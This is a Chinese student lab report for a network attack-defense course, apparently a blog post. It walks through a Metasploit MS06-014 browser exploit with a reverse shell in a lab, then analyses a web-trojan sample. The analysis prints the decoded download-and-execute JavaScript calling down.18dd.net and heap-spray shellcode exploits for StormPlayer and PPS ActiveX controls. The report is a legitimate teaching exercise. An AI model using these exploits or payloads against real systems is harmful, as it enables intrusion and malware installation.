20232827 田紫晴 2023-2024-2 《网络攻防实践》实践十一报告

20232827 田紫晴 2023-2024-2 《网络攻防实践》实践十一报告

1.实践内容

(1)web浏览器渗透攻击

任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

实验步骤:

①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本

④在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令

(2)取证分析实践—网页木马攻击场景分析

实践过程:

①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,

②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。

③如果解密出的地址给出的是网页或脚本文件,请继续解密。

④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。

⑤重复以上过程直到这些文件被全部分析完成。

(3)攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2.实践过程

2.1web浏览器渗透攻击

攻击机:kali192.168. 200.5
靶机:win2k192.168.200.9

1、在kali中输入msfconsole,进入Metasploit控制台
在这里插入图片描述

2、输入命令search MS06-014
在这里插入图片描述
3、输入use exploit/windows/browser/ie_createobject
在这里插入图片描述
4、依次输入

set payload generic/shell_reverse_tcp

再输入set RHOST 192.168.200.9设置靶机地址,输入set LHOST 192.168.200.5来设置攻击机地址
在这里插入图片描述

5、输入exploit之后,会返回一个有木马的网址http://192.168.200.5:8080/tMRGzu8A

在这里插入图片描述

6、在靶机win2k浏览器中输入该网址,会返回一串英文字符
在这里插入图片描述

7、在kali中输入sessions
在这里插入图片描述
输入session 1打开这个会话
在这里插入图片描述
打开后可以输入指令ipconfig 查看靶机的IP地址信息
在这里插入图片描述
可以看到攻击成功。

2.2 取证分析实践—网页木马攻击场景分析
实验之前先修改主机名

sudo hostnamectl set-hostname 新的主机名

1、先在kali里下载老师的压缩包,打开original中的start.html
输入以下:gedit start.html
在这里插入图片描述

2、使用同样的操作打开new09.htm

gedit new09.htm

在这里插入图片描述

3、可以看到里面引用到了两个文件,接下来进下面的网站对两个文件进行散列求MD5值
在这里插入图片描述
在这里插入图片描述
4、在windows下用记事本打开23180a42a2ff1192150231b44ffdf3d3
在这里插入图片描述
再打开7f60672dcd6b5e90b6772545ee219bd3
在这里插入图片描述
密钥是\x73\x63\x72\x69\x70\x74
5、登录https://tool.lu/hexstr/ 进行转换
在这里插入图片描述
6、我们对之前文件中的t变量进行解密,密钥即为script
在这里插入图片描述
7、将这串十六进制转化为字符串
在这里插入图片描述
如下:

function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){};
finally{if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){};
finally{if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}

相关的四个漏洞:
http://aa.18dd.net/aa/1.js
http://aa.18dd.net/aa/b.js
http://aa.18dd.net/aa/pps.js
http://down.18dd.net/bb/bd.cab

8、依次求这四个的MD5值
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到的hash值为:
5D7E9058A857AA2ABEE820D5473C5FA4
3870C28CC279D457746B3796A262F166
5F0B8BF0385314DBE0E5EC95E6ABEDC2
1C1D7B3539A617517C49EEE4120783B2

9、首先在hash文件中查看5d7e9058a857aa2abee820d5473c5fa
在这里插入图片描述
十六进制转字符串
在这里插入图片描述
如下:

var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

10、再看3870c28cc279d457746b3796a262f166文件
在这里插入图片描述
11、使用packed进行解密
在这里插入图片描述
如下;

var bigblock=unescape("%u9090%u9090");var headersize=20;var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<300;x++)memory[x]=block+shellcode;var buffer='';while(buffer.length<4068)buffer+="\x0a\x0a\x0a\x0a";storm.rawParse(buffer)

12、我们取从第三个2f开始到末尾的内容解密
在这里插入图片描述
得到的网址为:http://down.18dd.net/bb/bf.exe
13、分析5f0b8bf0385314dbe0e5ec95e6abedc2
在这里插入图片描述
转字符串

/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="\x0a\x0a\x0a\x0a";
pps.Logo = buffer

14、按上述操作得到网址
http://down.18dd.net/bb/pps.exe
MD5加密:
在这里插入图片描述
如下:FF59B3B8961F502289C1B4DF8C37E2A4
15、已经得出全部
最后一个 http://down.18dd.net/bb/bd.cab 做Hash得到结果为1C1D7B3539A617517C49EEE4120783B2,
我们在hash文件中找到并将其重命名为bd.cab,打开后就是bd.exe
在这里插入图片描述
得到可执行文件bd.exe
16、四个可执行文件的结果一样,只需分析一个即可
在这里插入图片描述

在winXP中用PEid打开bd.exe
在这里插入图片描述
17、使用IDA Pro Free打开bd.exe文件
在这里插入图片描述
18、点击view–Graphs–Flow chart查看文件的函数流程图
在这里插入图片描述
19、在Strings一栏中可以看到会下载二十个.exe木马程序
在这里插入图片描述

2.3 攻防对抗实践—web浏览器渗透攻击攻防
(1)作为攻击方

攻击机 田192.168.43.144
靶机 马192.168.43.65

在攻击机kali上按照实验一的步骤进行攻击
在这里插入图片描述
在这里插入图片描述
构造一个虚假邮件诱导防守方点击连接
在这里插入图片描述
输入sessions -i 1可以操作靶机,攻击成功
在这里插入图片描述
(2)作为防守方

攻击机 马192.168.43.166
靶机 田192.168.43.129

在这里插入图片描述
使用view source看源码,弹出记事本
在这里插入图片描述
利用压缩格式化工具http://www.esjson.com/htmlformat.html 进行压缩格式化
在这里插入图片描述
根据

t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}'

而BD96C556-65A3-11D0-983A-00C04FC29E36 是与MS06-014漏洞相关的一个 COM 对象的标识符,所以可以得出这个攻击使用了MS06-014漏洞。

3.学习中遇到的问题及解决

  • 问题1:第一个实验用winXP来做 session不成功
  • 问题1解决方案:换用了win2k就好了
  • 问题2:在做第三个实验时,用桥接模式但网段仍不改变
  • 问题2解决方案:重启了几次,更改了vm的设置

4.实践总结

本次实验通过浏览器渗透攻击、取证分析和攻防对抗三个环节,全面体验了网页木马的构造与实施过程。在使用Metasploit进行浏览器渗透攻击中,成功建立了远程控制会话。取证分析实践中,通过解密和分析恶意代码,深入了解其行为。攻防对抗实践中,成功构造并混淆渗透攻击代码,并通过邮件发送给防守方,防守方则提取并分析了攻击代码,有效识别并防御了浏览器漏洞攻击。此次实验提升了对浏览器漏洞利用和防御的实际操作与分析能力。

参考资料

  • 24
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值